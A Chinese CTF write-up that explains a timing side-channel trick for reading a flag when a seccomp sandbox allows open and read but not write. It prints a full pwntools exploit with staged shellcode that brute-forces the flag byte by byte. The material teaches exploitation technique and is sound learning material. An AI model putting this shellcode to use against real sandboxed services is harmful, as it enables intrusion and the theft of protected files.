做SCTF时碰到一个没看过的题型,比赛结束之后才知道是orw的一个玩法,测信道攻击。主要特点就是只给使用open,read,但是不给write,即无法把flag输出到终端。这里可以通过把flag读到栈上,再逐个爆破比较,来确定flag。原理和web的时间盲注类似。

下面给出一个UNCTF的测信道攻击的例题:

 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3)

 2 {

 3   unsigned int v3; // eax

 4   __int64 v5; // [rsp+50h] [rbp-40h]

 5   __int64 v6; // [rsp+58h] [rbp-38h]

 6   __int128 buf; // [rsp+60h] [rbp-30h] BYREF

 7   __int64 v8; // [rsp+70h] [rbp-20h]

 8   unsigned __int64 v9; // [rsp+80h] [rbp-10h]

 9

10   v9 = __readfsqword(0x28u);

11   sub_AE0(a1, a2, a3);

12   buf = 0LL;

13   v8 = 0LL;

14   puts("Are you a shellcode master?");

15   alarm(0x14u);

16   v3 = getpagesize();

17   v6 = (int)mmap((void *)0x1000, v3, 7, 34, 0, 0LL);

18   read(0, &buf, 0x18uLL);

19   prctl(38, 1LL, 0LL, 0LL, 0LL);

20   v5 = seccomp_init(0LL);

21   seccomp_rule_add(v5, 2147418112LL, 15LL, 0LL);

22   seccomp_rule_add(v5, 2147418112LL, 2LL, 0LL);

23   seccomp_rule_add(v5, 2147418112LL, 0LL, 0LL);

24   seccomp_rule_add(v5, 2147418112LL, 10LL, 0LL);

25   seccomp_load(v5);

26   *(_QWORD *)(v6 + 16) = v8;

27   *(_OWORD *)v6 = buf;

28   ((void (__fastcall *)(__int64, __int64))v6)(3735928559LL, 4919LL);

29   return 0LL;

30 }

主函数的开头mmap了一块大空间,然后读入数据到buf,接着会把分配的那块内存的开头赋为我们刚刚读入的内容,并且执行。

读入的0x18并不足够写入整个orw_shellcode,所以我们先写入一个shellcode来读取内容,再进行爆破。

下面是exp:

 1 import time

 2 from pwn import *

 3

 4 context.arch='amd64'

 5

 6 def getshellcode():

 7     global s

 8     shellcode = '''

 9         mov rdi, 0

10         mov rsi, 0x10018

11         mov rdx, 0x250

12         syscall

13         nop

14         '''

15     s.recvline()

16     s.send(asm(shellcode))

17     sleep(0.1)

18

19 def pwn():

20     global s

21     flag = ''

22     count = 1

23     for i in range (len(flag),0x50):

24         left = 32

25         right = 127

26         while left < right:

27             s = process('./ezshell')

28             #s = remote('node2.hackingfor.fun',38235)

29             getshellcode()

30             mid = (left + right) >> 1

31             orw_shellcode = f'''

32                 mov rdi, 0x67616c662f2e

33                 push rdi

34                 mov rdi, rsp

35                 mov rsi, 0

36                 mov rdx, 0

37                 mov rax, 2

38                 syscall

39                 mov rdi, 3

40                 mov rsi, rsp

41                 mov rdx, 0x100

42                 mov rax, 0

43                 syscall

44                 mov dl, byte ptr [rsp+{i}]

45                 mov cl, {mid}

46                 cmp dl, cl

47                 ja loop

48                 ret

49                 loop:

50                 jmp loop

51             '''

52             s.sendline(asm(orw_shellcode))

53             start_time = time.time()

54             try:

55                 s.recv(timeout=0.2)

56                 if(time.time() - start_time > 0.1):

57                     left = mid + 1

58             except:

59                 right = mid

60             s.close()

61             log.info('time-->'+str(count))

62             log.info(flag)

63             count +=1

64         flag += chr(left)

65         log.info(flag)

66         if(flag[-1] == '}'):

67             break

68 pwn()

69 s.interactive()

题目附件
提取码:2efj

ORW-测信道攻击的更多相关文章

  1. 嵌入式 -- WINKHUB 边信道攻击 (NAND Glitch)

    0x00 前言 随着物联网IOT的飞速发展,各类嵌入式设备, 路由器安全研究也越来越火. 但因为跟以往纯软件安全研究的要求不同, 这类研究往往需要结合相应的硬件知识. 很多朋友困惑如何开始, 甚至卡在 ...

  2. intel:spectre&Meltdown侧信道攻击(三)—— raw hammer

    今天介绍raw hammer攻击的原理:这次有点“标题党”了.事实上,raw hammer是基于DRAM内存的攻击:所以理论上,只要是用了DRAM内存的设备,不论是什么cpu(intel.amd,或则 ...

  3. intel:spectre&Meltdown侧信道攻击(一)

    只要平时对安全领域感兴趣的读者肯定都听过spectre&Meltdown侧信道攻击,今天简单介绍一下这种攻击的原理( https://www.bilibili.com/video/av1814 ...

  4. 第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御

    第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御 原文地址:http://bristolcrypto.blogspot.com/2015/07/52-things-numbe ...

  5. 第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法

    第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法 原文地址:http://bristolcrypto.blogspot.com/2015/08/52-things-number-45-de ...

  6. 侧信道攻击,从喊666到入门之——Unicorn的环境构建

    作者:backahasten 发表于小米安全中心微信公众号 0x00 前言 Unicorn可以模拟多种指令集的代码,在很多安全研究领域有很强大的作用,但是由于需要从头自己布置栈空间,代码段等虚拟执行环 ...

  7. intel:spectre&Meltdown侧信道攻击(四)—— cache mapping

    前面简单介绍了row hammer攻击的原理和方法,为了更好理解这种底层硬件类攻击,今天介绍一下cpu的cache mapping: 众所周知,cpu从内存读数据,最开始用的是虚拟地址,需要通过分页机 ...

  8. intel:spectre&Meltdown侧信道攻击(二)

    上面一篇介绍了spectre&meltdown基本原理和简单的demo方案,今天继续学习一下该漏洞发现团队原始的POC:https://spectreattack.com/spectre.pd ...

  9. intel:spectre&Meltdown侧信道攻击(五)—— DRAM address mapping

    前面介绍了row hammer,理论上很完美,实际操作的时候会面临很尴尬的问题:内存存储数据最小的单位是cell(就是个电容,充电是1,放电是0),无数个横着的cell组成row,无数个竖着的cell ...

随机推荐

  1. css通配样式初始化(多款,供君自选)

    腾讯官网 body,ol,ul,h1,h2,h3,h4,h5,h6,p,th,td,dl,dd,form,fieldset,legend,input,textarea,select{margin:0; ...

  2. 【leetcode】36. Valid Sudoku(判断能否是合法的数独puzzle)

    Share Determine if a 9 x 9 Sudoku board is valid. Only the filled cells need to be validated accordi ...

  3. 基本类型、引用类型NPE异常

    1.null是Java中的关键字,像public.static.final.它是大小写敏感的,你不能将null写成Null或NULL,编译器将不能识别它们然后报错. 2.就像每种原始类型都有默认值一样 ...

  4. ActiveMQ(一)——简介

    一.ActiveMQ简介 ActiveMQ是什么ActiveMQ是Apache推出的,一款开源的,完全支持JMS1.1和J2EE1.4规范的JMS Provider实现的消中间件(MOM) Activ ...

  5. 【阿菜做实践】利用go语言写一个简单的Pow样例

    本篇博客的主要内容是用go写一个简单的Proof-of-Work共识机制,不涉及到网络通信环节,只是一个本地的简单demo.开发IDE用的是JB Golang. 整个项目的文件结构如下: PoWdem ...

  6. 深度解析Spring Cloud Ribbon的实现源码及原理

    Ribbon的核心作用就是进行请求的负载均衡,它的基本原理如下图所示.就是客户端集成Ribbon这个组件,Ribbon中会针对已经配置的服务提供者地址列表进行负载均衡的计算,得到一个目标地址之后,再发 ...

  7. idea开发环境搭建ssh

    idea2020完整web开发(struts2+spring+hibernate) idea破解 第一步: 下载最新的 IDEA 2020.3.2 版本安装包 https://www.jetbrain ...

  8. shell脚本 批量查看mysql表条目数

    一.简介 源码地址 日期:2018/4/12 介绍:查看mysql的信息,用于比对和查询条目数 效果图: 二.使用 适用:centos6+ 语言:中文 注意:适用于5.7版本,其它版本要更改变量han ...

  9. Java Record 的一些思考 - 默认方法使用以及基于预编译生成相关字节码的底层实现

    快速上手 Record 类 我们先举一个简单例子,声明一个用户 Record. public record User(long id, String name, int age) {} 这样编写代码之 ...

  10. AcWing 466. 回文日期

    题目: 在日常生活中,通过年.月.日这三个要素可以表示出一个唯一确定的日期. 牛牛习惯用 8 位数字表示一个日期,其中,前 4 位代表年份,接下来 2 位代表月份,最后 2 位代表日期. 显然:一个日 ...